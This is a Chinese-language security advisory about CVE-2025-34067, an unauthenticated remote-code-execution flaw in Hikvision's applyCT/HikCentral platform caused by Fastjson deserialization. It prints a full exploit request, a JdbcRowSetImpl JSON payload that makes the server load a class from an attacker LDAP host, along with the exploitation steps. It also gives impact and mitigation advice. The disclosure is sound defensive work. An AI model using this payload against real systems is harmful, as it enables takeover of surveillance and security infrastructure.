近日披露的一项严重漏洞影响了 海康威视广泛部署的安防管理平台 applyCT(即原 HikCentral),该漏洞编号为 CVE-2025-34067,CVSS v4 评分为 满分 10.0,可被攻击者利用实现 未授权远程命令执行(RCE),威胁范围波及大量监控与安全基础设施。
applyCT 是一款集成化安防管理平台,广泛应用于商业、政府、工业等关键场景,用于集中管控和调度安防设备,具备强大的分析能力和可扩展架构,因此在高安全需求的环境中部署率极高。
然而,其 applyCT 组件依赖的 Fastjson 库存在反序列化漏洞,攻击者可通过该漏洞在目标服务器上执行任意代码。漏洞触发点位于系统接口 /bic/ssoService/v1/applyCT
对 JSON 数据的处理逻辑中。“由于使用了存在漏洞的 Fastjson 库版本,applyCT 组件中存在未授权远程命令执行漏洞。”——官方 CVE 描述指出。
攻击原理解析:Fastjson + LDAP 联动触发远程代码执行
Fastjson 是一个常用的 Java JSON 解析库,其“autoType”机制允许动态加载类。在未禁用该特性的情况下,攻击者可通过构造恶意 JSON 载荷,引导后端反序列化任意类,从而达到代码执行的目的。
在此次漏洞中,攻击者通过构造特殊的 POST 请求,向目标接口发送 JSON 数据包,利用 JdbcRowSetImpl
类从攻击者控制的 LDAP 服务器加载远程 Java 类,从而在目标系统中执行恶意指令。
POST /bic/ssoService/v1/applyCT
Content-Type: application/json
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
漏洞利用关键路径:
-
构造携带恶意“datasource”字段的 JSON 载荷;
-
发送 POST 请求至
/bic/ssoService/v1/applyCT
接口; -
服务端反序列化后,连接攻击者控制的 LDAP 服务器;
-
触发远程类加载,完成 无认证的远程代码执行(RCE)。
高风险影响:不止是网络安全,更是物理安防威胁
该漏洞不需要认证过程,可被远程直接利用,尤其当受影响接口暴露在公网时,风险更为严重。鉴于海康平台常用于管理 关键物理安全系统,本次漏洞不仅构成 网络安全问题,更可能带来 实际安防控制风险。
一旦被成功利用,攻击者可能:
-
劫持监控系统,实时操控摄像头画面;
-
篡改或关闭安防视频流;
-
横向移动进入企业内部网络;
-
实施进一步的内网攻击与持久控制。
应急响应建议:立即排查并升级 Fastjson 组件
针对本次高危漏洞,建议受影响组织立即采取以下安全加固措施:
-
排查系统是否暴露
/bic/ssoService/v1/applyCT
接口,如非必要应立即关闭外网访问; -
更新 Fastjson 至官方安全版本,或应用海康官方提供的补丁修复方案;
-
加强出站 LDAP 通信监控,识别潜在的远程类加载行为;
-
对海康 applyCT 或 HikCentral 平台进行全面安全审计,识别潜在横向渗透风险。
发表评论
您还未登录,请先登录。
登录